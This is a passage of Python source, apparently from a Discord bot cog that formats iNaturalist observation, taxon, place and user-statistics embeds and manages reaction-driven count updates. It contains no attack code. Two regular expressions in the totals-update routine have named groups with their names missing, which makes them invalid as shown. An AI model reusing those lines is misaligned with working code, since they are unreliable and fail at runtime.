QueryResponse):\r\n \"\"\"Return embed for observation counts from place or by user.\"\"\"\r\n formatted_counts = \"\"\r\n taxon = query_response.taxon\r\n user = query_response.user\r\n place = query_response.place\r\n unobserved_by = query_response.unobserved_by\r\n id_by = query_response.id_by\r\n count_args = query_response.obs_args()\r\n\r\n title_query_response = copy.copy(query_response)\r\n description = \"\"\r\n if user or unobserved_by or id_by:\r\n if user:\r\n title_query_response.user = None\r\n header = TAXON_COUNTS_HEADER\r\n elif unobserved_by:\r\n user = copy.copy(title_query_response.unobserved_by)\r\n title_query_response.unobserved_by = None\r\n header = TAXON_NOTBY_HEADER\r\n elif id_by:\r\n user = copy.copy(title_query_response.id_by)\r\n title_query_response.id_by = None\r\n header = TAXON_IDBY_HEADER\r\n formatted_counts = await format_user_taxon_counts(\r\n self, user, taxon, **count_args\r\n )\r\n elif place:\r\n formatted_counts = await format_place_taxon_counts(\r\n self, place, taxon, **count_args\r\n )\r\n title_query_response.place = None\r\n header = TAXON_PLACES_HEADER\r\n summary_counts = \"\"\r\n 
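A side note on the counting idiom used by summarize_obs_spp_counts() above: passing per_page=0 makes the iNat API return metadata only, so total_results arrives without any records, which keeps these summary queries cheap. A minimal standalone sketch of that pattern, assuming aiohttp and the public v1 endpoints (the OBS_ENDPOINT constant and both helper names are illustrative assumptions, not part of this module):

import aiohttp

OBS_ENDPOINT = "https://api.inaturalist.org/v1/observations"  # assumed endpoint

async def count_only(session: aiohttp.ClientSession, path: str = "", **params) -> int:
    # per_page=0 returns no records, just the total_results count
    async with session.get(OBS_ENDPOINT + path, params={**params, "per_page": 0}) as resp:
        data = await resp.json()
        return data["total_results"]

async def obs_and_species_counts(session, **params):
    # The same query viewed two ways, mirroring the paired calls above
    observations = await count_only(session, **params)
    species = await count_only(session, "/species_counts", **params)
    return observations, species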
title_query_args = title_query_response.obs_args()\r\n summary_counts = await self.summarize_obs_spp_counts(taxon, title_query_args)\r\n if formatted_counts:\r\n description = f\"\\n{summary_counts}\\n{header}\\n{formatted_counts}\"\r\n else:\r\n description = summary_counts\r\n\r\n title_args = title_query_response.obs_args()\r\n url = obs_url_from_v1(title_args)\r\n full_title = f\"Observations {title_query_response.obs_query_description()}\"\r\n embed = make_embed(url=url, title=full_title, description=description)\r\n return embed\r\n\r\n async def format_obs(\r\n self,\r\n ctx,\r\n obs,\r\n with_description=True,\r\n with_link=False,\r\n compact=False,\r\n with_user=True,\r\n lang=None,\r\n ):\r\n \"\"\"Format an observation title & description.\"\"\"\r\n\r\n if lang and obs.taxon:\r\n taxon = await get_taxon(ctx, obs.taxon.id)\r\n else:\r\n taxon = obs.taxon\r\n taxon_summary = None\r\n community_taxon = None\r\n community_taxon_summary = None\r\n if not compact:\r\n taxon_summary = await ctx.inat_client.observations.taxon_summary(obs.id)\r\n if obs.community_taxon_id and obs.community_taxon_id != obs.taxon.id:\r\n community_taxon = ctx.inat_client.taxa.from_ids(\r\n obs.community_taxon_id, limit=1\r\n ).one()\r\n community_taxon_summary = (\r\n await ctx.inat_client.observations.taxon_summary(\r\n obs.id, community=1\r\n )\r\n )\r\n formatter = ObservationFormatter(\r\n obs,\r\n with_description=with_description,\r\n with_link=with_link,\r\n compact=compact,\r\n with_user=with_user,\r\n taxon=taxon,\r\n taxon_summary=taxon_summary,\r\n community_taxon=community_taxon,\r\n community_taxon_summary=community_taxon_summary,\r\n )\r\n return formatter.format(join_title=compact)\r\n\r\n async def make_obs_embed(self, ctx, obs, url, preview: Union[bool, int] = True):\r\n \"\"\"Return embed for an observation link.\"\"\"\r\n # pylint: disable=too-many-locals\r\n\r\n def format_image_title_url(taxon, obs, num):\r\n if taxon:\r\n title = format_taxon_name(taxon)\r\n else:\r\n title = \"Unknown\"\r\n title += f\" (Image {num} of {len(obs.photos)})\"\r\n mat = re.search(r\"/photos/(\\d+)\", obs.photos[num - 1].original_url)\r\n if mat:\r\n photo_id = mat[1]\r\n url = f\"{WWW_BASE_URL}/photos/{photo_id}\"\r\n else:\r\n url = None\r\n\r\n return (title, url)\r\n\r\n embed = make_embed(url=url)\r\n\r\n if obs:\r\n image_only = False\r\n error = None\r\n if preview:\r\n if isinstance(preview, bool):\r\n image_number = 1\r\n else:\r\n image_number = preview\r\n image_only = True\r\n if obs.photos and image_number >= 1 and image_number <= len(obs.photos):\r\n image = obs.photos[image_number - 1]\r\n embed.set_image(url=image.original_url)\r\n embed.set_footer(text=image.attribution)\r\n else:\r\n image_only = False\r\n if obs.photos:\r\n num = len(obs.photos)\r\n error = (\r\n f\"*Image number out of range; must be between 1 and {num}.*\"\r\n )\r\n else:\r\n error = \"*This observation has no images.*\"\r\n\r\n if image_only:\r\n (title, url) = format_image_title_url(obs.taxon, obs, image_number)\r\n embed.title = title\r\n embed.url = url\r\n embed.description = (\r\n f\"[Observation]({obs.uri}) \"\r\n f\"of [{obs.taxon.name}]({obs.taxon.url}) \"\r\n f\"by [{obs.user.login}]({obs.user.url})\"\r\n )\r\n else:\r\n lang = await get_lang(ctx)\r\n embed.title, summary = await self.format_obs(\r\n ctx, obs, lang=lang, with_link=True\r\n )\r\n if error:\r\n summary += \"\\n\" + error\r\n embed.description = summary\r\n else:\r\n mat = re.search(PAT_OBS_LINK, url)\r\n if mat:\r\n obs_id = 
int(mat[\"obs_id\"])\r\n logger.debug(\"Observation not found for: %s\", obs_id)\r\n embed.title = \"No observation found for id: %s (deleted?)\" % obs_id\r\n else:\r\n # If this happens, it's a bug (i.e. PAT_OBS_LINK should already match)\r\n logger.error(\"Not an observation: %s\", url)\r\n embed.title = \"Not an observation:\"\r\n embed.description = url\r\n\r\n return embed\r\n\r\n async def make_related_embed(self, ctx, taxa, missing_taxa=None):\r\n \"\"\"Return embed for related taxa.\"\"\"\r\n lang = await get_lang(ctx)\r\n names = format_taxon_names_for_embed(\r\n taxa, with_term=True, names_format=\"**The taxa:** %s\", lang=lang\r\n )\r\n taxa_iter = iter(taxa)\r\n first_taxon = next(taxa_iter)\r\n if len(taxa) == 1:\r\n taxon = first_taxon\r\n else:\r\n first_taxon_ancestor_ids = first_taxon.ancestor_ids\r\n first_set = set(first_taxon_ancestor_ids)\r\n remaining_sets = [set(taxon.ancestor_ids) for taxon in taxa_iter]\r\n common_ancestors = first_set.intersection(*remaining_sets)\r\n\r\n common_ancestor_indices = [\r\n first_taxon_ancestor_ids.index(ancestor_id)\r\n for ancestor_id in common_ancestors\r\n ]\r\n if not common_ancestor_indices:\r\n taxon = await get_taxon(ctx, ROOT_TAXON_ID)\r\n else:\r\n common_ancestor_id = first_taxon_ancestor_ids[\r\n max(common_ancestor_indices)\r\n ]\r\n taxon = await get_taxon(ctx, common_ancestor_id)\r\n\r\n description = (\r\n f\"{names}\\n**are related by {taxon.rank}**: \"\r\n f\"{format_taxon_name(taxon, lang=lang)}\\n\\n\"\r\n f\"[Species observations]({WWW_BASE_URL}/observations\"\r\n f\"?taxon_ids={','.join([str(t.id) for t in taxa])}&view=species)\"\r\n )\r\n embed = make_embed(title=\"Closest related taxon\", description=description)\r\n if missing_taxa:\r\n embed.set_footer(\r\n text=f\"Some taxa could not be found and were ignored: {','.join(missing_taxa)}\"\r\n )\r\n return (taxon, embed)\r\n\r\n async def get_image_embed(self, ctx, taxon, index=1):\r\n \"\"\"Make embed showing default image for taxon.\"\"\"\r\n lang = await get_lang(ctx)\r\n _taxon = await ctx.inat_client.taxa.populate(taxon)\r\n embed = make_image_embed(_taxon, index=index, lang=lang)\r\n return embed\r\n\r\n async def get_taxa_embed(\r\n self, ctx: Context, arg: Union[QueryResponse, Taxon], include_ancestors=True\r\n ):\r\n \"\"\"Make embed describing taxa record.\"\"\"\r\n formatter_params = {\r\n \"lang\": ctx.inat_client.ctx.get_inat_user_default(\"inat_lang\"),\r\n \"max_len\": MAX_EMBED_DESCRIPTION_LEN,\r\n \"with_url\": False,\r\n }\r\n if isinstance(arg, QueryResponse):\r\n place = arg.place\r\n if place:\r\n taxon = await ctx.inat_client.taxa.populate(\r\n arg.taxon, preferred_place_id=place.id\r\n )\r\n else:\r\n taxon = await ctx.inat_client.taxa.populate(arg.taxon)\r\n formatter_params[\"taxon\"] = taxon\r\n user = arg.user\r\n title_query_response = copy.copy(arg)\r\n if user:\r\n title_query_response.user = None\r\n elif place:\r\n title_query_response.place = None\r\n obs_args = title_query_response.obs_args()\r\n # i.e. 
any args other than the ones accounted for in taxon.observations_count\r\n if [arg for arg in obs_args if arg != \"taxon_id\"]:\r\n formatter_params[\"observations\"] = await self.api.get_observations(\r\n per_page=0, **obs_args\r\n )\r\n formatter = QualifiedTaxonFormatter(\r\n title_query_response, **formatter_params\r\n )\r\n elif isinstance(arg, Taxon):\r\n taxon = await ctx.inat_client.taxa.populate(arg)\r\n formatter_params[\"taxon\"] = taxon\r\n user = None\r\n place = None\r\n obs_args = {\"taxon_id\": taxon.id}\r\n formatter = TaxonFormatter(**formatter_params)\r\n else:\r\n logger.error(\"Invalid input: %s\", repr(arg))\r\n raise BadArgument(\"Invalid input.\")\r\n\r\n description = formatter.format(\r\n with_ancestors=include_ancestors, with_title=False\r\n )\r\n\r\n if user:\r\n formatted_counts = await format_user_taxon_counts(\r\n self, user, taxon, **arg.obs_args()\r\n )\r\n if formatted_counts:\r\n description += f\"\\n{TAXON_COUNTS_HEADER}\\n{formatted_counts}\"\r\n elif place:\r\n formatted_counts = await format_place_taxon_counts(\r\n self, place, taxon, **arg.obs_args()\r\n )\r\n if formatted_counts:\r\n description += f\"\\n{TAXON_PLACES_HEADER}\\n{formatted_counts}\"\r\n\r\n embed = make_taxa_embed(taxon, formatter, description)\r\n\r\n return embed\r\n\r\n async def get_user_project_stats(\r\n self, project_id, user, category: str = \"obs\", with_rank: bool = True\r\n ):\r\n \"\"\"Get user's ranked obs & spp stats for a project.\"\"\"\r\n\r\n async def get_unranked_count(*args, **kwargs):\r\n _kwargs = {\r\n \"user_id\": user.id,\r\n \"per_page\": 0,\r\n **kwargs,\r\n }\r\n if project_id:\r\n _kwargs[\"project_id\"] = project_id\r\n response = await self.api.get_observations(*args, **_kwargs)\r\n if response:\r\n return response[\"total_results\"]\r\n return \"unknown\"\r\n\r\n stats = None\r\n rank = None\r\n count = 0\r\n\r\n if category == \"taxa\":\r\n count = await get_unranked_count(\"species_counts\")\r\n if with_rank:\r\n rank = \"unranked\"\r\n return (count, rank)\r\n\r\n kwargs = {}\r\n if category == \"spp\":\r\n kwargs[\"order_by\"] = \"species_count\"\r\n # TODO: cache for a short while so users can compare stats but not\r\n # have to worry about stale data.\r\n if with_rank:\r\n if project_id:\r\n kwargs[\"project_id\"] = project_id\r\n response = await self.api.get_observers_stats(**kwargs)\r\n stats = response.get(\"results\")\r\n if stats:\r\n rank = next(\r\n (\r\n index + 1\r\n for (index, d) in enumerate(stats)\r\n if d[\"user_id\"] == user.id\r\n ),\r\n None,\r\n )\r\n if rank:\r\n ranked = stats[rank - 1]\r\n count = (\r\n ranked[\"species_count\"]\r\n if category == \"spp\"\r\n else ranked[\"observation_count\"]\r\n )\r\n if not (with_rank and rank):\r\n if category == \"spp\":\r\n count = await get_unranked_count(\"species_counts\", hrank=\"species\")\r\n else:\r\n count = await get_unranked_count() # obs\r\n if with_rank and not rank:\r\n rank = \">500\" if count > 0 else \"unranked\"\r\n return (count, rank)\r\n\r\n async def get_user_server_projects_stats(self, ctx, user):\r\n \"\"\"Get a user's stats for the server's main event projects.\"\"\"\r\n event_projects = None\r\n if ctx.guild:\r\n event_projects = await self.config.guild(ctx.guild).event_projects()\r\n if not event_projects:\r\n # No projects defined; implicit `ever` project for all-time stats\r\n event_projects = {\"ever\": {\"project_id\": 0, \"main\": True}}\r\n projects_by_id = {\r\n int(event_projects[prj][\"project_id\"]): prj\r\n for prj in event_projects\r\n if 
event_projects[prj].get(\"main\")\r\n }\r\n project_ids = [project_id for project_id in projects_by_id if project_id]\r\n projects = await self.api.get_projects(project_ids, refresh_cache=True)\r\n stats = []\r\n for project_id in projects_by_id:\r\n if project_id and project_id not in projects:\r\n continue\r\n # Project id 0 is a pseudo-project consisting of just one person\r\n # - this allows a server to define user's all-time stats to put in\r\n # `,me` without a project to track them\r\n # - set up this special stats item with:\r\n # `,inat set event ever 0 true`\r\n # - note that\r\n if project_id:\r\n user_project = UserProject.from_json(projects[project_id][\"results\"][0])\r\n is_member = user.id in user_project.observed_by_ids()\r\n else:\r\n is_member = True\r\n if is_member:\r\n abbrev = projects_by_id[int(project_id)]\r\n obs_stats = await self.get_user_project_stats(\r\n project_id, user, with_rank=False\r\n )\r\n spp_stats = await self.get_user_project_stats(\r\n project_id, user, category=\"spp\", with_rank=False\r\n )\r\n taxa_stats = await self.get_user_project_stats(\r\n project_id, user, category=\"taxa\", with_rank=False\r\n )\r\n emoji = event_projects[abbrev].get(\"emoji\")\r\n stats.append(\r\n (project_id, abbrev, emoji, obs_stats, spp_stats, taxa_stats)\r\n )\r\n return stats\r\n\r\n async def make_user_embed(self, ctx, member, user):\r\n \"\"\"Make an embed for user including user stats.\"\"\"\r\n description = f\"{member.mention} is {format_user_link(user)}\"\r\n if ctx.guild:\r\n event_projects = await self.config.guild(ctx.guild).event_projects() or {}\r\n main_projects = {\r\n event_project: event_projects[event_project]\r\n for event_project in event_projects\r\n if event_projects[event_project].get(\"main\")\r\n }\r\n # The \"master project\" for the server is hardcoded to be the event\r\n # project with the abbrev \"ever\"\r\n # - if it is defined and has a custom emoji set, use that\r\n # - otherwise, fall back to :white_check_mark: to indicate a\r\n # mod-added member in this server\r\n master_project = main_projects.get(\"ever\")\r\n master_project_emoji = (\r\n master_project and master_project.get(\"emoji\")\r\n ) or \":white_check_mark:\"\r\n if master_project_emoji and await has_valid_user_config(\r\n self, member, False\r\n ):\r\n description += f\" {master_project_emoji}\"\r\n embed = make_embed()\r\n project_stats = await self.get_user_server_projects_stats(ctx, user)\r\n for (\r\n project_id,\r\n abbrev,\r\n emoji,\r\n obs_stats,\r\n spp_stats,\r\n taxa_stats,\r\n ) in project_stats:\r\n obs_count, _obs_rank = obs_stats\r\n spp_count, _spp_rank = spp_stats\r\n taxa_count, _taxa_rank = taxa_stats\r\n obs_args = {\"user_id\": user.id}\r\n if int(project_id):\r\n obs_args[\"project_id\"] = project_id\r\n obs_url = obs_url_from_v1(\r\n {**obs_args, \"view\": \"observations\", \"verifiable\": \"any\"}\r\n )\r\n spp_url = obs_url_from_v1(\r\n {**obs_args, \"view\": \"species\", \"verifiable\": \"any\", \"hrank\": \"species\"}\r\n )\r\n taxa_url = obs_url_from_v1(\r\n {**obs_args, \"view\": \"species\", \"verifiable\": \"any\"}\r\n )\r\n fmt = (\r\n f\"[{obs_count:,}]({obs_url}) / [{spp_count:,}]({spp_url}) / \"\r\n f\"[{taxa_count:,}]({taxa_url})\"\r\n )\r\n embed.add_field(\r\n name=f\"Obs / Spp / Leaf taxa ({abbrev})\", value=fmt, inline=True\r\n )\r\n embed.description = description\r\n ids = user.identifications_count\r\n url = f\"[{ids:,}]({WWW_BASE_URL}/identifications?user_id={user.id})\"\r\n embed.add_field(name=\"Ids\", value=url, 
inline=True)\r\n return embed\r\n\r\n async def make_stats_embed(self, member, user, project):\r\n \"\"\"Make an embed for user showing stats for a project.\"\"\"\r\n embed = make_embed(\r\n title=project.title, url=project.url, description=member.mention\r\n )\r\n project_id = project.id\r\n obs_count, obs_rank = await self.get_user_project_stats(project_id, user)\r\n spp_count, spp_rank = await self.get_user_project_stats(\r\n project_id, user, category=\"spp\"\r\n )\r\n taxa_count, _taxa_rank = await self.get_user_project_stats(\r\n project_id, user, category=\"taxa\"\r\n )\r\n obs_args = {\"project_id\": project.id, \"user_id\": user.id}\r\n obs_url = obs_url_from_v1(\r\n {**obs_args, \"view\": \"observations\", \"verifiable\": \"any\"}\r\n )\r\n spp_url = obs_url_from_v1(\r\n {**obs_args, \"view\": \"species\", \"verifiable\": \"any\", \"hrank\": \"species\"}\r\n )\r\n taxa_url = obs_url_from_v1({**obs_args, \"view\": \"species\", \"verifiable\": \"any\"})\r\n fmt = (\r\n f\"[{obs_count:,}]({obs_url}) (#{obs_rank}) / \"\r\n f\"[{spp_count:,}]({spp_url}) (#{spp_rank}) / \"\r\n f\"[{taxa_count:,}]({taxa_url})\"\r\n )\r\n embed.add_field(\r\n name=\"Obs (rank) / Spp (rank) / Leaf taxa\", value=fmt, inline=True\r\n )\r\n return embed\r\n\r\n async def add_obs_reaction_emojis(self, ctx, msg, query_response: QueryResponse):\r\n \"\"\"Add obs embed reaction emojis.\"\"\"\r\n reaction_emojis = (\r\n OBS_PLACE_REACTION_EMOJIS\r\n if _add_place_emojis(query_response)\r\n else OBS_REACTION_EMOJIS\r\n if _add_user_emojis(query_response)\r\n else []\r\n )\r\n return await add_reactions_with_cancel(ctx, msg, reaction_emojis)\r\n\r\n async def add_taxon_reaction_emojis(\r\n self,\r\n ctx,\r\n msg,\r\n query_response: Union[QueryResponse, Taxon],\r\n taxonomy=True,\r\n with_keep=False,\r\n ):\r\n \"\"\"Add taxon embed reaction emojis.\"\"\"\r\n if isinstance(query_response, QueryResponse):\r\n taxon = query_response.taxon\r\n else:\r\n taxon = query_response\r\n query_response = None\r\n add_place_emojis = _add_place_emojis(query_response, True)\r\n if taxonomy and len(taxon.ancestor_ids) > 2:\r\n reaction_emojis = (\r\n TAXON_PLACE_REACTION_EMOJIS\r\n if add_place_emojis\r\n else TAXON_REACTION_EMOJIS\r\n if _add_user_emojis(query_response)\r\n else []\r\n )\r\n else:\r\n reaction_emojis = (\r\n NO_PARENT_TAXON_PLACE_REACTION_EMOJIS\r\n if add_place_emojis\r\n else NO_PARENT_TAXON_REACTION_EMOJIS\r\n if _add_user_emojis(query_response)\r\n else []\r\n )\r\n return await add_reactions_with_cancel(\r\n ctx, msg, reaction_emojis, with_keep=with_keep\r\n )\r\n\r\n async def send_embed_for_taxon_image(\r\n self, ctx, query_response: Union[QueryResponse, Taxon], index=1, with_keep=False\r\n ):\r\n \"\"\"Make embed for taxon image & send.\"\"\"\r\n msg = await ctx.send(\r\n embed=await self.get_image_embed(ctx, query_response, index)\r\n )\r\n # TODO: drop taxonomy=False when #139 is fixed\r\n # - This workaround omits Taxonomy reaction to make it less likely a\r\n # user will break the display; they can use `,last t` to get the taxon\r\n # display with taxonomy instead, if they need it.\r\n # - Note: a tester may still manually add the :regional_indicator_t:\r\n # reaction to test the feature in its current, broken state.\r\n return await self.add_taxon_reaction_emojis(\r\n ctx, msg, query_response, taxonomy=False, with_keep=with_keep\r\n )\r\n\r\n async def send_embed_for_taxon(\r\n self,\r\n ctx,\r\n query_response,\r\n include_ancestors=True,\r\n with_keep=False,\r\n related_embed=None,\r\n ):\r\n 
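The stats embeds above all build their clickable counts the same way: an f-string thousands separator inside Discord's [label](url) link markdown, pointed at a URL from obs_url_from_v1(). The formatting idiom reduced to a self-contained sketch (the counts and URLs here are made up):

def linked_count(count: int, url: str) -> str:
    # Discord renders [label](url) in embed text as a hyperlink; ':,' groups thousands
    return f"[{count:,}]({url})"

obs = linked_count(12345, "https://www.inaturalist.org/observations?user_id=1")
spp = linked_count(678, "https://www.inaturalist.org/observations?user_id=1&view=species")
print(f"{obs} / {spp}")  # [12,345](...) / [678](...)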
\"\"\"Make embed for taxon & send.\"\"\"\r\n taxon_embed = await self.get_taxa_embed(\r\n ctx, query_response, include_ancestors=include_ancestors\r\n )\r\n embeds = [taxon_embed]\r\n if related_embed:\r\n embeds.append(related_embed)\r\n msg = await ctx.send(embeds=embeds)\r\n return await self.add_taxon_reaction_emojis(\r\n ctx, msg, query_response, with_keep=with_keep\r\n )\r\n\r\n async def send_obs_embed(self, ctx, embed, obs, **reaction_params):\r\n \"\"\"Send observation embed and sound.\"\"\"\r\n\r\n async def hybrid_send(ctx, **kwargs):\r\n \"\"\"See d.py /discord/ext/commands/context.py send()\"\"\"\r\n if ctx.interaction is None:\r\n msg = await ctx.channel.send(**kwargs)\r\n else:\r\n if ctx.interaction.response.is_done():\r\n msg = await ctx.interaction.followup.send(**kwargs, wait=True)\r\n else:\r\n await ctx.interaction.response.send_message(**kwargs)\r\n msg = await ctx.interaction.original_response()\r\n return msg\r\n\r\n msg = None\r\n if obs and obs.sounds:\r\n async with self.sound_message_params(\r\n ctx.channel, obs.sounds, embed=embed\r\n ) as params:\r\n if params:\r\n msg = await hybrid_send(ctx, **params)\r\n if not msg:\r\n msg = await hybrid_send(ctx, embed=embed)\r\n\r\n return await add_reactions_with_cancel(ctx, msg, [], **reaction_params)\r\n\r\n def get_inat_url_ids(self, url):\r\n \"\"\"Match taxon_id & optional place_id/user_id from an iNat taxon or obs URL.\"\"\"\r\n taxon_id = None\r\n place_id = None\r\n inat_user_id = None\r\n mat = re.match(PAT_TAXON_LINK, url)\r\n if not mat:\r\n mat = re.match(PAT_OBS_TAXON_LINK, url)\r\n if mat:\r\n place_id = mat[\"place_id\"]\r\n inat_user_id = mat[\"user_id\"]\r\n if mat:\r\n taxon_id = mat[\"taxon_id\"]\r\n return (taxon_id, place_id, inat_user_id)\r\n\r\n async def maybe_update_user(\r\n self,\r\n ctx,\r\n msg: discord.Message,\r\n action: str,\r\n member: Optional[discord.Member] = None,\r\n user: Optional[User] = None,\r\n ):\r\n \"\"\"Add or remove user count in the embed if valid.\"\"\"\r\n inat_user = None\r\n if member:\r\n try:\r\n inat_user = await self.user_table.get_user(member)\r\n except LookupError:\r\n return\r\n if user:\r\n inat_user = user\r\n if not inat_user:\r\n return\r\n\r\n counts_pat = r\"(\\n|^)\\[[0-9, \\(\\)]+\\]\\(.*?\\) \" + inat_user.login\r\n inat_embed = msg.embeds[0]\r\n if inat_embed.taxon_id():\r\n taxon = await get_taxon(ctx, inat_embed.taxon_id())\r\n else:\r\n taxon = None\r\n # Observed by count add/remove for taxon:\r\n await self.edit_totals_locked(msg, taxon, inat_user, action, counts_pat)\r\n\r\n async def maybe_update_place(\r\n self,\r\n ctx,\r\n msg: discord.Message,\r\n user: discord.Member,\r\n action: str,\r\n place: Place = None,\r\n ):\r\n \"\"\"Add or remove place count in the embed if valid.\"\"\"\r\n try:\r\n await self.user_table.get_user(user)\r\n except LookupError:\r\n return\r\n\r\n update_place = None\r\n if place is None:\r\n try:\r\n update_place = await self.place_table.get_place(msg.guild, \"home\", user)\r\n except LookupError:\r\n return\r\n else:\r\n update_place = place\r\n\r\n inat_embed = msg.embeds[0]\r\n place_counts_pat = r\"(\\n|^)\\[[0-9, \\(\\)]+\\]\\(.*?\\) \" + re.escape(\r\n update_place.display_name\r\n )\r\n if inat_embed.taxon_id():\r\n taxon = await get_taxon(ctx, inat_embed.taxon_id())\r\n else:\r\n taxon = None\r\n await self.edit_place_totals_locked(\r\n msg, taxon, update_place, action, place_counts_pat\r\n )\r\n\r\n async def query_locked(self, msg, user, prompt, timeout):\r\n \"\"\"Query member with user 
lock.\"\"\"\r\n\r\n async def is_query_response(response):\r\n # so we can ignore '[p]cancel` too. doh!\r\n # - FIXME: for the love of Pete, why does response.content\r\n # contain the cancel command? then we could remove this\r\n # foolishness.\r\n prefixes = await self.bot.get_valid_prefixes(msg.guild)\r\n config = self.config.guild(msg.guild)\r\n other_bot_prefixes = await config.bot_prefixes()\r\n all_prefixes = prefixes + other_bot_prefixes\r\n ignore_prefixes = r\"|\".join(re.escape(prefix) for prefix in all_prefixes)\r\n prefix_pat = re.compile(r\"^({prefixes})\".format(prefixes=ignore_prefixes))\r\n return not re.match(prefix_pat, response.content)\r\n\r\n response = None\r\n if user.id not in self.predicate_locks:\r\n self.predicate_locks[user.id] = asyncio.Lock()\r\n lock = self.predicate_locks[user.id]\r\n if lock.locked():\r\n # An outstanding query for this user hasn't been answered.\r\n # They must answer it or the timeout must expire before they\r\n # can start another interaction.\r\n return\r\n\r\n async with self.predicate_locks[user.id]:\r\n query = await msg.channel.send(prompt)\r\n try:\r\n response = await self.bot.wait_for(\r\n \"message_without_command\",\r\n check=MessagePredicate.same_context(channel=msg.channel, user=user),\r\n timeout=timeout,\r\n )\r\n except asyncio.TimeoutError:\r\n with contextlib.suppress(discord.HTTPException):\r\n await query.delete()\r\n return\r\n\r\n # Cleanup messages:\r\n if await is_query_response(response):\r\n try:\r\n await msg.channel.delete_messages((query, response))\r\n except (discord.HTTPException, AttributeError):\r\n # In case the bot can't delete other users' messages:\r\n with contextlib.suppress(discord.HTTPException):\r\n await query.delete()\r\n else:\r\n # Response was a command for another bot: just delete the prompt\r\n # and discard the response.\r\n with contextlib.suppress(discord.HTTPException):\r\n await query.delete()\r\n response = None\r\n return response\r\n\r\n async def maybe_update_user_by_name(\r\n self, ctx, msg: discord.Message, member: discord.Member\r\n ):\r\n \"\"\"Prompt for a user by name and update the embed if provided & valid.\"\"\"\r\n try:\r\n await self.user_table.get_user(member)\r\n except LookupError:\r\n return\r\n response = await self.query_locked(\r\n msg,\r\n member,\r\n \"Add or remove which user (you have 15 seconds to answer)?\",\r\n 15,\r\n )\r\n if response:\r\n try:\r\n _user = await self.query.get_inat_user(ctx, response.content)\r\n except (LookupError, discord.ext.commands.errors.BadArgument) as error:\r\n error_msg = await msg.channel.send(error)\r\n await asyncio.sleep(15)\r\n with contextlib.suppress(discord.HTTPException):\r\n await error_msg.delete()\r\n return\r\n\r\n await self.maybe_update_user(ctx, msg, user=_user, action=\"toggle\")\r\n\r\n async def maybe_update_place_by_name(\r\n self, ctx, msg: discord.Message, user: discord.Member\r\n ):\r\n \"\"\"Prompt user for place by name and update the embed if provided & valid.\"\"\"\r\n try:\r\n await self.user_table.get_user(user)\r\n except LookupError:\r\n return\r\n response = await self.query_locked(\r\n msg,\r\n user,\r\n \"Add or remove which place (you have 15 seconds to answer)?\",\r\n 15,\r\n )\r\n if response:\r\n try:\r\n place = await self.place_table.get_place(\r\n msg.guild, response.content, user\r\n )\r\n except LookupError as error:\r\n error_msg = await msg.channel.send(error)\r\n await asyncio.sleep(15)\r\n with contextlib.suppress(discord.HTTPException):\r\n await error_msg.delete()\r\n 
return\r\n\r\n await self.maybe_update_place(ctx, msg, user, \"toggle\", place)\r\n\r\n async def maybe_update_taxonomy(self, ctx, message):\r\n \"\"\"Update taxonomy in taxon embed, if applicable.\"\"\"\r\n embeds = message.embeds\r\n inat_embed = embeds[0]\r\n description = inat_embed.description or \"\"\r\n new_description = re.sub(TAXONOMY_PAT, \"\", description)\r\n if new_description == description:\r\n full_taxon = await get_taxon(ctx, inat_embed.taxon_id())\r\n if full_taxon:\r\n formatted_names = format_taxon_names(\r\n full_taxon.ancestors, hierarchy=True\r\n )\r\n hierarchy = re.sub(HIERARCHY_PAT, \"\", formatted_names, 1)\r\n new_description = re.sub(\r\n NO_TAXONOMY_PAT,\r\n \" in:\\n\" + hierarchy + r\"\\1\",\r\n description,\r\n 1,\r\n )\r\n else:\r\n return\r\n inat_embed.description = new_description\r\n await message.edit(embed=inat_embed)\r\n\r\n async def update_totals(\r\n self,\r\n description,\r\n taxon,\r\n inat_user,\r\n action,\r\n inat_embed,\r\n counts_pat,\r\n ):\r\n \"\"\"Update the totals for the embed.\"\"\"\r\n unobserved = inat_embed.has_not_by_users()\r\n ident = inat_embed.has_id_by_users()\r\n if not (unobserved or ident):\r\n # Add/remove always results in a change to totals, so remove:\r\n description = re.sub(\r\n r\"\\n\\[[0-9, \\(\\)]+?\\]\\(.*?\\) \\*total\\*\", \"\", description\r\n )\r\n\r\n matches = re.findall(\r\n r\"\\n\\[[0-9, \\(\\)]+\\]\\(.*?\\) (?P[-_a-z0-9]+)\", description\r\n )\r\n count_params = {**inat_embed.params}\r\n if action == \"remove\":\r\n # Remove the header if last one and the user's count:\r\n if len(matches) == 1:\r\n if unobserved:\r\n description = re.sub(TAXON_NOTBY_HEADER_PAT, \"\", description)\r\n elif ident:\r\n description = re.sub(TAXON_IDBY_HEADER_PAT, \"\", description)\r\n else:\r\n description = re.sub(TAXON_COUNTS_HEADER_PAT, \"\", description)\r\n description = re.sub(counts_pat + r\".*?((?=\\n)|$)\", \"\", description)\r\n else:\r\n # Add the header if first one and the user's count:\r\n if not matches:\r\n if unobserved:\r\n # not currently possible (new :hash: reaction starts 'by' embed)\r\n description += \"\\n\" + TAXON_NOTBY_HEADER\r\n elif ident:\r\n # not currently possible (new :hash: reaction starts 'by' embed)\r\n description += \"\\n\" + TAXON_IDBY_HEADER\r\n else:\r\n description += \"\\n\" + TAXON_COUNTS_HEADER\r\n user_id = inat_user.id\r\n if unobserved:\r\n count_params[\"unobserved_by_user_id\"] = user_id\r\n elif ident:\r\n count_params[\"ident_user_id\"] = user_id\r\n else:\r\n count_params[\"user_id\"] = user_id\r\n formatted_counts = await format_user_taxon_counts(\r\n self,\r\n inat_user,\r\n taxon,\r\n **count_params,\r\n )\r\n description += \"\\n\" + formatted_counts\r\n\r\n if not (unobserved or ident):\r\n matches = re.findall(\r\n r\"\\n\\[[0-9, \\(\\)]+\\]\\(.*?[?&]user_id=(?P\\d+).*?\\)\",\r\n description,\r\n )\r\n # Total added only if more than one user:\r\n if len(matches) > 1:\r\n user_ids = \",\".join(matches)\r\n count_params[\"user_id\"] = user_ids\r\n formatted_counts = await format_user_taxon_counts(\r\n self,\r\n user_ids,\r\n taxon,\r\n **count_params,\r\n )\r\n description += f\"\\n{formatted_counts}\"\r\n return description\r\n return description\r\n\r\n async def edit_totals_locked(\r\n self,\r\n msg,\r\n taxon,\r\n inat_user,\r\n action,\r\n counts_pat,\r\n ):\r\n \"\"\"Update totals for message locked.\"\"\"\r\n if msg.id not in self.reaction_locks:\r\n self.reaction_locks[msg.id] = asyncio.Lock()\r\n async with self.reaction_locks[msg.id]:\r\n # If 
